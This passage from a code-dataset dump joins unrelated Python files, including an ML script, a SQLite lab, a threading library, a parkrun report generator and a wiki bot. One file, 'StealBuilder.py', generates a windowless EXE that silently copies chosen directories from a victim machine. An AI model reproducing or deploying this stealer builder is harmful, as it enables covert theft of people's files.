testing_data_df.iterrows():\n testing_data.append(\" \".join(row[1]))\n\ntraining_data = np.array(training_data)\ntesting_data = np.array(testing_data)\n\nprint(training_data.shape)\nprint(testing_data.shape)\nprint(\"****** Done loading training/testing description data ******\")\n\n\n\n# Bag of Words Model \nword_dict = {}\n\n# iterate thru all reviews in the training set\nfor i in range(len(training_data)):\n review = training_data[i]\n \n for w in word_tokenize(review):\n if w not in word_dict:\n word_dict[w] = 0\n\nprint(len(word_dict)) #7321\n#print(word_dict)\nprint(\"****** Done building word dictionary ******\")\n\n\n# iterate all reviews in both sets to create review feature vectors\ntraining_vectors = build_description_feature(\"train\")\ntesting_vectors = build_description_feature(\"test\")\n\nprint(training_vectors.shape) #10000*7321\nprint(training_vectors)\n\nprint(testing_vectors.shape) # 2000*7321\n#print(testing_vectors)\nprint(\"****** Done building bow features normalizations ******\")\n\n\n\n\n\n##########################################################\n# Image features (label)\n##########################################################\n\ntraining_label = pd.read_csv(\n './data/features_train/training-image-feature-2.csv', \n sep=\",\", header=None)\n\nprint(training_label.shape)\n\ntesting_label = pd.read_csv(\n './data/features_test/testing-image-feature-2.csv', \n sep=\",\", header=None)\n\nprint(testing_label.shape)\nprint(\"****** Done loading images features ******\")\n\n\n\n\n\n\n##########################################################\n# Model \n##########################################################\n\nlr = linear_model.LinearRegression()\nlr.fit(training_vectors, training_label)\nlr_pred = lr.predict(testing_vectors)\nprint(lr_pred.shape)\nprint(lr_pred)\nprint(\"\\n**** Done LRegression ****\") \n\nnp.savetxt(\"./output/lr_pred.csv\",lr_pred, delimiter=\",\")\nprint(\"\\n**** Saving output ****\") \n\n","sub_path":"checkpoint/v3-bow-LR.py","file_name":"v3-bow-LR.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"289537199","text":"import sqlite3\r\nimport random\r\nimport datetime\r\nconn=sqlite3.connect('Sales.db')\r\n\r\nk=conn.cursor()\r\n\r\nk.execute('''CREATE TABLE IF NOT EXISTS Sales ( \r\n Id INTEGER PRIMARY KEY,\r\n Country TEXT, \r\n City TEXT, \r\n Shop TEXT, \r\n Date DATETIME, \r\n Money INTEGER\r\n );\r\n ''')\r\n\r\n\r\nCountries = [ 'Russia',\r\n 'German',\r\n 'Ukrain',\r\n 'UK']\r\nCities = {'Russia':\r\n ['Moscow', 'Belgorod', 'St. Petersburg', 'Kogalym'],\r\n 'German':\r\n ['Berlin', 'Munich ', 'Frankfurt', 'Dortmund '],\r\n 'Ukrain':\r\n ['Kiev', 'Odessa', 'Minsk', 'Varsaw' ],\r\n 'UK':\r\n ['London', 'Manchester', 'Liverpool', 'Glasgow']}\r\nShops = ['Taobao', 'Amazon','Aliexpress','eBay']\r\n\r\nf = open(\"result.txt\", \"w\",encoding='utf-8')\r\n\r\n\r\nstart_date=datetime.datetime(2014, 1, 1,0,0,0)\r\nend_date = datetime.datetime(2015, 1, 1,0,0,0)\r\n\r\nfor i in range(10000):\r\n cur_country=random.choice(Countries)\r\n cur_city=random.choice(Cities[cur_country])\r\n cur_shop=random.choice(Shops)\r\n cur_date=start_date+(end_date-start_date)*random.random()\r\n cur_int=random.randint(10000,1000000)\r\n k.execute( '''INSERT INTO Sales(\r\n Country , \r\n City , \r\n Shop , \r\n Date , \r\n Money ) VALUES ( ?, ?, ?, ?, ?)''',\r\n (\r\n \r\n cur_country,\r\n cur_city,\r\n cur_shop,\r\n cur_date,\r\n cur_int\r\n ) \r\n )\r\n if(i<100):\r\n f.writelines(str(i)+\"\\t\")\r\n f.writelines(cur_country+\"\\t\")\r\n f.writelines(cur_city+\"\\t\")\r\n f.writelines(cur_shop+\"\\t\")\r\n f.writelines(str(cur_date)+\"\\t\")\r\n f.writelines(str(cur_int)+\"\\t\\n\")\r\n\r\n\r\n\r\nf.writelines('Задание 1\\n')\r\nquery = 'SELECT COUNT(*) FROM Sales'\r\nk.execute(query)\r\nf.writelines([query,\"\\nКоличество записей:\" + str(k.fetchall()[0][0])+\"\\n\"])\r\n\r\n\r\nf.writelines('Задание 2\\n')\r\n\r\nquery = 'Select Country, count(Shop) from Sales group by Country'\r\nf.writelines([query,\"\\nКоличество магазинов в стране:\\n\"])\r\nres=k.execute(query).fetchall()\r\nfor i in res:\r\n f.writelines(str(j)+'\\t' for j in i)\r\n f.write('\\n')\r\n\r\n\r\n\r\n\r\nf.writelines('Задание 3\\n')\r\nquery = 'SELECT Shop, SUM(Money) FROM Sales GROUP BY Shop'\r\nf.writelines([query,\"\\nСумма продаж по магазинам:\\n\"])\r\nk.execute(query)\r\nres=k.fetchall()\r\nfor i in res:\r\n f.writelines(str(j)+'\\t' for j in i)\r\n f.write('\\n')\r\n \r\n\r\n\r\nf.writelines('Задание 4\\n')\r\nquery='''SELECT Shop, SUM(Money) FROM Sales WHERE (Country = ? AND \r\nDate BETWEEN \"2014-06-01\" AND \"2014-09-01\") GROUP BY Shop'''\r\ncur_country = input(\"\\nВведите страну: \")\r\nf.writelines([query,\"\\nВ стране \"+cur_country+\" выручка за лето составила\\n\"])\r\n\r\nres=k.execute(query, (cur_country, )).fetchall()\r\nfor i in res:\r\n f.writelines(str(j)+'\\t' for j in i)\r\n f.write('\\n')\r\n\r\nf.close()\r\nconn.commit()\r\nconn.close()","sub_path":"Lab2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"6739228","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# multitasking: Non-blocking Python methods using decorators\n# https://github.com/ranaroussi/multitasking\n#\n# Copyright 2016 Ran Aroussi\n#\n# Licensed under the GNU Lesser General Public License, v3.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.gnu.org/licenses/lgpl-3.0.en.html\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n__version__ = \"0.0.4a\"\n\nfrom sys import exit as sysexit\nfrom os import _exit as osexit\n\nfrom threading import Thread, Semaphore\nfrom multiprocessing import Process, cpu_count\n\n__CPU_CORES__ = cpu_count()\n\n# processing\n__ENGINE__ = \"thread\"\n__MAX_THREADS__ = cpu_count()\n__KILL_RECEIVED__ = False\n__TASKS__ = []\n__POOLS__ = {}\n__POOL_NAME__ = \"Main\"\n\n\ndef set_max_threads(threads=None):\n global __MAX_THREADS__\n if threads is not None:\n __MAX_THREADS__ = threads\n else:\n __MAX_THREADS__ = cpu_count()\n\n\ndef set_engine(kind=\"\"):\n global __ENGINE__\n if \"process\" in kind.lower():\n __ENGINE__ = \"process\"\n else:\n __ENGINE__ = \"thread\"\n\ndef getPool(name=None):\n if name is None:\n name = __POOL_NAME__\n\n return {\n \"engine\": \"thread\" if __POOLS__[__POOL_NAME__][\"engine\"] == Thread else \"process\",\n \"name\": name,\n \"threads\": __POOLS__[__POOL_NAME__][\"threads\"]\n }\n\ndef createPool(name=\"main\", threads=None, engine=None):\n global __MAX_THREADS__, __ENGINE__, __POOLS__, __POOL_NAME__\n\n __POOL_NAME__ = name\n\n try: threads = int(threads)\n except: threads = __MAX_THREADS__\n if threads < 2: threads = 0\n\n\n engine = engine if engine is not None else \"thread\"\n\n __MAX_THREADS__ = threads\n __ENGINE__ = engine\n\n __POOLS__[__POOL_NAME__] = {\n \"pool\": Semaphore(threads) if threads > 0 else None,\n \"engine\": Process if \"process\" in engine.lower() else Thread,\n \"name\": name,\n \"threads\": threads\n }\n\ndef task(callee):\n global __KILL_RECEIVED__, __TASKS__, __POOLS__, __POOL_NAME__\n\n # create default pool if nont exists\n if not __POOLS__:\n createPool()\n\n def _run_via_pool(*args, **kwargs):\n with __POOLS__[__POOL_NAME__]['pool']:\n return callee(*args, **kwargs)\n\n def async_method(*args, **kwargs):\n # no threads\n if __POOLS__[__POOL_NAME__]['threads'] == 0:\n return callee(*args, **kwargs)\n\n # has threads\n if not __KILL_RECEIVED__:\n task = __POOLS__[__POOL_NAME__]['engine'](\n target=_run_via_pool, args=args, kwargs=kwargs, daemon=False)\n __TASKS__.append(task)\n task.start()\n return task\n\n return async_method\n\ndef wait_for_tasks():\n global __KILL_RECEIVED__, __TASKS__, __POOLS__, __POOL_NAME__\n __KILL_RECEIVED__ = True\n\n if __POOLS__[__POOL_NAME__]['threads'] == 0:\n return True\n\n try:\n running = len([t.join(1) for t in __TASKS__ if t is not None and t.isAlive()])\n while running > 0:\n running = len([t.join(1) for t in __TASKS__ if t is not None and t.isAlive()])\n except:\n pass\n return True\n\ndef killall(cls):\n global __KILL_RECEIVED__\n __KILL_RECEIVED__ = True\n try:\n sysexit(0)\n except SystemExit:\n osexit(0)\n","sub_path":"mDataAn_venv/Lib/site-packages/multitasking/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"556781787","text":"from bs4 import BeautifulSoup\nfrom re import compile\nfrom itertools import zip_longest\nfrom jinja2 import Environment, FileSystemLoader\n\n\nclass RunReportUtils:\n\n @staticmethod\n def get_sections(seq, num):\n out = []\n last = 0.0\n\n while last < len(seq):\n out.append(seq[int(last):int(last + num)])\n last += num\n\n return out\n\n @staticmethod\n def chunks(seq, chunk_size):\n \"\"\"Yield successive chunkSize-sized chunks from list.\"\"\"\n for i in range(0, len(seq), chunk_size):\n yield seq[i:i + chunk_size]\n\n @staticmethod\n def reverse_find(haystack, needle, n):\n pos = len(haystack)\n for i in range(0, n):\n pos = haystack.rfind(needle, 0, pos)\n return pos\n\n\nclass RunReport(object):\n parkrun_name = ''\n parkrun_event_number = ''\n options = {\n 'template_name': 'base',\n 'runner_limit': 7,\n 'volunteer_limit': 2,\n 'pb_limit': 2,\n 'number_event_urls': 8\n }\n\n template_loader = False\n template_env = False\n \n results_system_text = ''\n current_event_volunteers = []\n current_event_runners = {}\n\n event_result_count = []\n runners = {}\n volunteers = {}\n photos = []\n toc = []\n\n content_text = {}\n \n VOLUNTEER_START_TEXT = 'We are very grateful to the volunteers who made this event happen:'\n PB_TEXT = 'New PB!'\n RESULT_SYSTEM_START_TEXT = 'This week'\n\n def __init__(self, name, event_number):\n self.parkrun_name = name\n self.parkrun_event_number = event_number\n\n self.template_loader = FileSystemLoader(searchpath=\"templates/\")\n self.template_env = Environment(loader=self.template_loader)\n self.template_env.trim_blocks = True\n self.template_env.lstrip_blocks = True\n \n # make sure these are reset each time you call the init\n self.runners = {}\n self.volunteers = {}\n\n def set_results_system(self, text):\n text = text.strip()\n if text == '':\n return\n if len(text) > 3000:\n print(\"Result System Text is limited to 3000 characters\\nAre you sure you copied from the results system?\")\n return\n self.results_system_text = text\n\n def reset_event_result(self):\n self.current_event_volunteers = []\n self.current_event_runners = {}\n self.runners = {}\n self.volunteers = {}\n\n def parse_event_result(self, is_current=False, text=''):\n text = text.strip()\n if text == '':\n return\n if len(text) > 500000:\n print(\"Event Text is limited to 500,000 characters\")\n return\n if is_current:\n self.set_current_event(text)\n self.parse_runners(text)\n self.parse_volunteers(text)\n\n def parse_optional_text(self, text_type, text):\n text = text.strip()\n if text == '':\n return\n if len(text) > 3000:\n print(\"Optional Text is limited to 3000 characters\")\n return\n self.content_text[text_type] = text.format(self.parkrun_name)\n\n def set_current_event(self, text):\n text = text.strip()\n if text == '':\n return\n # set currentEventRunners and currentEventVolunteers \n self.set_current_event_runners(text)\n self.set_current_event_volunteers(text)\n \n def parse_current_event(self, text, parse_type):\n soup = BeautifulSoup(text, 'html.parser')\n rows = []\n if parse_type == 'runners':\n # get every row from the result table\n rows = soup.find(id=\"results\").find(\"tbody\").find_all(\"tr\")\n elif parse_type == 'volunteers':\n #

\n # We are very grateful to the volunteers who made this event happen:\n #

\n start = soup.p.find(text=compile(self.VOLUNTEER_START_TEXT))\n pos = start.find(':')\n sub = start[pos+1:]\n rows = sub.split(', ') \n return rows \n \n def set_current_event_runners(self, text):\n self.current_event_runners = {}\n rows = self.parse_current_event(text, 'runners')\n for row in rows:\n details = self.get_runner_details(row.find_all(\"td\"))\n if details:\n self.current_event_runners[details['id']] = {\n \"name\": details['name'],\n \"time\": details['time'],\n \"age_group\": details['age_group']\n }\n \n def set_current_event_volunteers(self, text):\n self.current_event_volunteers = []\n names = self.parse_current_event(text, 'volunteers')\n for n in names:\n self.current_event_volunteers.append(n)\n \n def get_runner_details(self, cells):\n # \n # 2\n #
Firstname LASTNAME\n # 18:14\n # SM30-34\n # 71.12 %\n # M\n # 2\n # \n # New PB!\n # 2\n # \n # \n cell = cells[1]\n name = cell.get_text() \n if name != 'Unknown':\n href = cell.a[\"href\"]\n # format of href=\"athletehistory?athleteNumber=208507\"\n pos = href.find('=')\n athlete_id = href[pos+1:]\n \n time = cells[2].get_text()\n age_group = cells[3].get_text()\n position = cells[0].get_text()\n pb = 0\n if cells[8].get_text() == self.PB_TEXT:\n pb = 1\n\n return {\n \"id\": athlete_id,\n \"name\": name,\n \"time\": time,\n \"pb\": pb,\n \"age_group\": age_group,\n \"position\": position\n }\n else:\n return False \n \n def parse_runners(self, text):\n text = text.strip()\n if text == '':\n return\t\n rows = self.parse_current_event(text, 'runners')\n event_count = 0\n for row in rows:\n cells = row.find_all(\"td\")\n details = self.get_runner_details(cells)\n if details:\n event_count = event_count + 1\n pb_count = 0\n if details['id'] in self.runners:\n count = self.runners[details['id']]['count'] + 1\n if details['pb'] == 1:\n pb_count = self.runners[details['id']]['pb_count'] + 1\n else:\n pb_count = self.runners[details['id']]['pb_count']\n else:\n count = 1\n if details['pb'] == 1:\n pb_count = 1\n\n self.runners[details['id']] = {\"name\": details['name'], \"pb_count\": pb_count, \"count\": count}\n self.event_result_count.append(event_count)\n # display number of runners as you parse each event result\n # this is to indicate to the user that something is happening\n # and as a visual guide that they can see the the totals, and double check data if duplicate numbers\n # i.e. they didn't accidentally copy and paste from the same event twice\n print('Event with '+str(event_count)+' known runners added')\n \n def parse_volunteers(self, text):\n text = text.strip()\n if text == '':\n return\n\n names = self.parse_current_event(text, 'volunteers')\n for n in names:\n if n in self.volunteers:\n count = self.volunteers[n] + 1\n else:\n count = 1\n self.volunteers[n] = count\n\n def reset_photos(self):\n self.photos = []\n \n def add_photo(self, size, photo_type, title='', text=''):\n text = text.strip()\n if text == '':\n return\n if len(text) > 300:\n print(\"Photo Text is limited to 300 characters\")\n return\n start_pos = text.find('[img]') + len('[img]')\n end_pos = text.find('.jpg') + len('.jpg')\n flickr_link = text[start_pos:end_pos]\n \n self.photos.append({'link': flickr_link, 'size': size, 'type': photo_type, 'title': title})\n \n def get_photo_links(self, photo_type):\n photos = []\n # width of 620 works best of the parkrun wordpress page\n picture_width = 620\n for p in self.photos:\n if p['type'] == photo_type:\n dims = p['size']\n curr_width = int(dims[0])\n curr_height = int(dims[1])\n # resize to a standard width of picture_width if picture is landscape\n if curr_width >= curr_height:\n dims[0] = picture_width\n dims[1] = (picture_width * curr_height) // curr_width\n # resize to a width that allows 2 pictures on a line if picture are portrait\n elif curr_height > curr_width:\n # get two pictures on one row\n dims[0] = picture_width // 2 - 5\n dims[1] = ((picture_width / 2 - 5) * curr_height) // curr_width\n photos.append({\n 'link': p['link'],\n 'alt': p['type'],\n 'width': dims[0],\n 'height': dims[1],\n 'title': p['title']\n })\n return photos\n \n def get_aesthetic_times(self):\n times_list = []\n\n for key, data in self.current_event_runners.items():\n time = data['time']\n # end in :00 or start = end like 21:21\n if time[-2:] == '00' or time[-2:] == time[0:2]:\n times_list.append(str(time) + ' - ' + data['name'])\n # e.g. 22:33 \n elif time[0] == time[1] and time[3] == time[4]:\n times_list.append(str(time) + ' - ' + data['name'])\n # e.g. 21:12 \n elif time[0] == time[4] and time[1] == time[2]:\n times_list.append(str(time) + ' - ' + data['name'])\n\n return times_list\n\n def calc_age_groups(self):\n runners = self.current_event_runners\n age_group = {}\n # results are sorted by position number, so first found for each age group is the fastest\n for l, v in runners.items():\n age = v['age_group']\n age_number = age[2:]\n details = {'name': v['name'], 'time': v['time']}\n if age[0:2] == 'SM' or age[0:2] == 'VM':\n if age_number not in age_group:\n age_group[age_number] = {'man': details, 'woman': {'name': '', 'time': ''}}\n elif age_group[age_number]['man']['name'] == '':\n age_group[age_number]['man'] = details\n elif age[0:2] == 'SW' or age[0:2] == 'VW':\n if age_number not in age_group:\n age_group[age_number] = {'man': {'name': '', 'time': ''}, 'woman': details}\n elif age_group[age_number]['woman']['name'] == '':\n age_group[age_number]['woman'] = details\n sorted_age = sorted(age_group.items(), key=lambda x: x[0])\n return sorted_age\n \n def get_age_group_finisher_summary(self):\n headers = [\n {'width': 20, 'text': 'Age Group', 'colspan': 1},\n {'width': 40, 'text': 'Men', 'colspan': 2},\n {'width': 40, 'text': 'Women', 'colspan': 2}\n ]\n summary_data = self.calc_age_groups()\n data = []\n for l, v in summary_data:\n data.append([l, v['man']['name'], v['man']['time'], v['woman']['name'], v['woman']['time']])\n\n return {'headers': headers, 'data': data}\n \n def get_regular_summary(self, runner_limit, volunteer_limit):\n events = len(self.event_result_count)\n headers = [\n {'width': 50, 'colspan': 1, 'type': 'Runners', 'limit': runner_limit, 'events': events},\n {'width': 50, 'colspan': 1, 'type': 'Volunteers', 'limit': volunteer_limit, 'events': events}\n ]\n # get the sorted name column for all runners with count above runner_limit\n regular_runners = [v['name'] for k, v in self.runners.items() if v['count'] >= runner_limit]\n runners_names = sorted(regular_runners)\n\n # get the sorted name column for all volunteers with count above volunteer_limit\n regular_volunteer = [k for k, v in self.volunteers.items() if v >= volunteer_limit]\n volunteer_names = sorted(regular_volunteer)\n # display as two columns, one for runners, one for volunteers, and they will probably be different lengths\n # so need to transpose the data\n combined = [runners_names, volunteer_names]\n data = list(zip_longest(*combined, fillvalue=''))\n\n return {'headers': headers, 'data': data}\n\n def get_pb_summary(self, pb_limit=2, data_columns=2):\n events = len(self.event_result_count)\n headers = [{'width': 100, 'colspan': data_columns, 'type': 'PBs', 'limit': pb_limit, 'events': events}]\n # get the sorted name column for all runners with pb_count above pb_limit\n summary_data = sorted([v['name'] for k, v in self.runners.items() if v['pb_count'] >= pb_limit])\n if data_columns == 1:\n data = summary_data\n else:\n # create list of data_columns size lists so the data can be multiple columns\n data = list(RunReportUtils.chunks(summary_data, data_columns))\n\n return {'headers': headers, 'data': data}\n\n\nclass RunReportWeek(RunReport):\n \n parkrun_week = 1\n run_report_html = ''\n sections = []\n \n def __init__(self, name, event_number):\n RunReport.__init__(self, name, event_number) \n \n def print_urls(self, week, number_event_urls):\n links = []\n self.parkrun_week = week\n event_number = str(self.parkrun_event_number) \n links.append('tag: ' + self.parkrun_name + '_parkrun_' + event_number)\n links.append('tag: ' + self.parkrun_name)\n links.append('tag: parkrun')\n links.append('https://www.flickr.com/groups_pool_add.gne?path=' + self.parkrun_name + '-parkrun')\n links.append('https://www.flickr.com/groups/' + self.parkrun_name + '-parkrun/')\n links.append('http://www.parkrun.com.au/'\n + self.parkrun_name + '/results/weeklyresults/?runSeqNumber='\n + event_number)\n \n if week == 2 or week == 3:\n for i in range(1, number_event_urls):\n event_number = str(self.parkrun_event_number - i)\n links.append('http://www.parkrun.com.au/'\n + self.parkrun_name + '/results/weeklyresults/?runSeqNumber='\n + event_number)\n \n # display as html (works correctly in browser, but not in pycharm notebook view)\n template = self.template_env.get_template(\"links.html\")\n return template.render({'links': links})\n\n def create_week(self, week=False, options=False):\n self.sections = []\n self.toc = []\n\n self.add_summary_section()\n # self.add_upcoming_section()\n self.add_volunteer_section()\n self.add_milestone_section()\n \n # allow override of week and options since week and options in class init are only used for link creation.\n if week is not False:\n self.parkrun_week = week\n \n # merge options\n if options is not False:\n self.options = {**self.options, **options}\n \n if self.parkrun_week == 1:\n self.add_age_group_section()\n elif self.parkrun_week == 2:\n self.add_regular_section(self.options['runner_limit'], self.options['volunteer_limit'])\n elif self.parkrun_week == 3:\n self.add_week_pb_section(self.options['pb_limit'])\n elif self.parkrun_week == 4:\n self.add_community_section()\n \n self.add_times_section()\n self.add_photo_section()\n\n args = {'sections': self.sections, 'toc': self.toc}\n template = self.template_env.get_template(self.options['template_name'] + \".html\")\n \n return template.render(args)\n\n def add_summary_section(self):\n text = self.results_system_text\n # find string position of third last .\n needle = '.'\n pos = RunReportUtils.reverse_find(text, needle, 3)\n\n section = {\n 'heading': 'Summary',\n 'anchor': 'summary',\n 'content': {\n 'start': '',\n 'list': [\n text[text.find(self.RESULT_SYSTEM_START_TEXT):text.find('.') + 1],\n text[pos + 1:].strip()\n ],\n 'end': self.content_text['summary'],\n },\n 'separator': True\n }\n\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_upcoming_section(self):\n # Only add section if there is upcoming text\n content = self.content_text['upcoming']\n if content == '':\n return\n section = {\n 'heading': 'Upcoming',\n 'anchor': 'upcoming',\n 'content': self.content_text['upcoming'],\n 'separator': True\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n\n def add_milestone_section(self):\n # Only add if there are any milestones\n photo_links = self.get_photo_links('milestone')\n if len(photo_links) == 0:\n return\n\n section = {\n 'heading': 'Milestones',\n 'anchor': 'milestone',\n 'photos': photo_links,\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_volunteer_section(self):\n section = {\n 'heading': 'Volunteers',\n 'anchor': 'volunteers',\n 'content': {\n 'start': self.content_text['volunteer'],\n 'list': self.current_event_volunteers,\n },\n 'separator': True,\n 'photos': self.get_photo_links('volunteer')\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_age_group_section(self):\n section = {\n 'heading': 'Age Group First Finishers',\n 'anchor': 'age_group',\n 'summary_data': self.get_age_group_finisher_summary()\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_regular_section(self, runner_limit=7, volunteer_limit=2):\n section = {\n 'heading': 'Regular Runners / Volunteers',\n 'anchor': 'regular',\n 'summary_data': self.get_regular_summary(runner_limit, volunteer_limit)\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_week_pb_section(self, pb_limit=2):\n section = {\n 'heading': 'Regular PBs',\n 'anchor': 'pbs',\n 'summary_data': self.get_pb_summary(pb_limit)\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_community_section(self):\n # TODO work out what to do here\n content = ''\n section = {\n 'heading': 'Having Fun',\n 'anchor': 'fun',\n 'content': content\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_times_section(self):\n section = {\n 'heading': 'Aesthetically pleasing times',\n 'anchor': 'times',\n 'content': {\n 'list': self.get_aesthetic_times(),\n },\n 'separator': True\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_photo_section(self):\n section = {\n 'heading': 'Photos',\n 'anchor': 'photos',\n 'photos': self.get_photo_links('photo')\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n","sub_path":"src/run_report.py","file_name":"run_report.py","file_ext":"py","file_size_in_byte":20942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"259971784","text":"from vpython import *\nprint('oi')\n\nscene = canvas(width = 600, height = 600, center = vector(0,5,0))\nSun = sphere(pos=vector(0,0,0), radius = 100, color = color.orange)\nearth = sphere(pos = vector(-200,0,0), radius = 10, color = color.blue, make_trail=True, trail_type='points', interval=10, retain=50)\nearthv = vector(0,5,0)\nfor i in range(0,10000):\n rate(100)\n earth.pos += earthv\n \n","sub_path":"comp-cientifica-II-2019-2/Project-II/Teste/visualtest.py","file_name":"visualtest.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"328587530","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nUser assisted updating redirect links on disambiguation pages.\n\nUsage:\n python disambredir.py [start]\n\nIf no starting name is provided, the bot starts at '!'.\n\n\"\"\"\n#\n# (C) André Engels, 2006-2009\n# (C) Pywikibot team, 2006-2014\n#\n# Distributed under the terms of the MIT license.\n#\nfrom __future__ import unicode_literals\n\n__version__ = '$Id$'\n#\nimport pywikibot\n\nfrom pywikibot import i18n, textlib, pagegenerators\nfrom pywikibot.bot import MultipleSitesBot, CurrentPageBot, InteractiveReplace\n\nmsg = {\n 'ar': u'تغيير التحويلات في صفحة توضيح',\n 'be-x-old': u'Замена перанакіраваньняў на старонку неадназначнасьцяў',\n 'en': u'Changing redirects on a disambiguation page',\n 'he': u'משנה קישורים להפניות בדף פירושונים',\n 'fa': u'اصلاح تغییرمسیرها در یک صفحه ابهام‌زدایی',\n 'ja': u'ロボットによる: 曖昧さ回避ページのリダイレクト修正',\n 'nl': u'Verandering van redirects op een doorverwijspagina',\n 'pl': u'Zmiana przekierowań na stronie ujednoznaczającej',\n 'pt': u'Arrumando redirects na página de desambiguação',\n 'ru': u'Изменение перенаправлений на странице неоднозначности',\n 'uk': u'Зміна перенаправлень на сторінці багатозначності',\n 'zh': u'機器人: 修改消歧義頁中的重定向連結',\n}\n\n\nclass DisambiguationRedirectBot(MultipleSitesBot, CurrentPageBot):\n\n \"\"\"Change redirects from disambiguation pages.\"\"\"\n\n def _create_callback(self, old, new):\n replace_callback = InteractiveReplace(\n old, new, default='n', automatic_quit=False, yes_shortcut=True)\n replace_callback.allow_replace_label = True\n return replace_callback\n\n def treat_page(self):\n \"\"\"Iterate over the linked pages and replace redirects conditionally.\"\"\"\n text = self.current_page.text\n for linked_page in self.current_page.linkedPages():\n try:\n target = linked_page.getRedirectTarget()\n except (pywikibot.Error, pywikibot.SectionError):\n continue\n # TODO: Work on all links at the same time (would mean that the user\n # doesn't get them ordered like in links but how they appear in the page)\n text = textlib.replace_links(\n text, self._create_callback(linked_page, target),\n self.current_page.site)\n\n if text != self.current_page.get():\n summary = i18n.translate(self.current_page.site, msg, fallback=True)\n self.put_current(text, summary=summary)\n\n\ndef main(*args):\n \"\"\"\n Process command line arguments and invoke bot.\n\n If args is an empty list, sys.argv is used.\n\n @param args: command line arguments\n @type args: list of unicode\n \"\"\"\n local_args = pywikibot.handle_args(args)\n\n start = local_args[0] if local_args else '!'\n\n mysite = pywikibot.Site()\n try:\n mysite.disambcategory()\n except pywikibot.Error as e:\n pywikibot.output(e)\n pywikibot.showHelp()\n return\n\n generator = pagegenerators.CategorizedPageGenerator(\n mysite.disambcategory(), start=start, content=True, namespaces=[0])\n\n bot = DisambiguationRedirectBot(generator=generator)\n bot.run()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/disambredir.py","file_name":"disambredir.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"182898490","text":"import os\nfrom os import getcwd\nfrom shutil import rmtree\n\n\ntargets = []\ncounter = 1\n\nprint(\"\"\"\n+----------------+\n| STEALBUILDER |\n| PixHead [1.0] |\n+----------------+\"\"\")\nprint(\"\\nEnter 'exit' to finish\")\n\nwhile True:\n\n\tdir = input(\"[%s]Directory: \" % counter)\n\n\tif dir != \"exit\":\n\t\ttargets.append(dir)\n\t\tcounter += 1\n\telse:\n\t\tbreak\n\nprint(\"=================\")\nname = input(\"Name for stealer: \")\nfullname = name + '.py' \nprint(\"\")\n\nwith open(fullname, \"w\") as f:\n\tf.write(\"\"\"\nfrom os import getcwd, mkdir\nfrom os.path import basename\nfrom shutil import copytree\n\ndirectory = getcwd() + '/Result/'\ntry:\n\tmkdir(directory)\nexcept:\n\tpass\n\ntargetlist = \"\"\" + str(targets) + \"\"\" \n\nfor target in targetlist:\n\tunder = directory + basename(target)\n\ttry:\n\t\tcopytree(target, under)\n\texcept:\n\t\tpass\n\"\"\")\n\n\nos.system(\"pyinstaller -w -F \" + getcwd() + \"/\" + fullname)\n\ntry:\n\trmtree(\"build\")\n\trmtree(\"__pycache__\")\n\tos.remove(fullname)\n\tos.remove(name + \".spec\")\n\tprint(\"\\nEXE file saved to ./dist\")\nexcept:\n\tprint(\"Something went wrong!\")\n\n","sub_path":"StealBuilder.py","file_name":"StealBuilder.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"573412205","text":"import os\nimport nltk\nstemmer = nltk.stem.lancaster.LancasterStemmer()\nimport tensorflow as tf\nimport random\nimport json\nimport shutil\nimport utils\nimport numpy as np\n#nltk.download('punkt')\n\ndef train():\n #Collect all unique occurring words in database\n words = []\n for association in utils.associations:\n for pattern in association['patterns']:\n words_current = utils.sentence_tokenize(pattern)\n for word in words_current:\n if not word in words:\n words.append(word)\n\n #Prepare training set\n #Add empty training set to prevent classification of not recognized sentence\n labels = []\n training = [[\n [0] * len(words),\n [0] * len(utils.associations)\n ]]\n labels.append([0] * len(utils.associations))\n\n for associationID in range(len(utils.associations)):\n association = utils.associations[associationID]\n for pattern in association['patterns']:\n #Prepare label\n label = [0] * len(utils.associations)\n label[associationID] = 1\n labels.append(label)\n\n #Prepare input vector\n sentence_tokenized = utils.sentence_tokenize(pattern)\n for tokenID in range(1, len(sentence_tokenized)+1):\n vector = 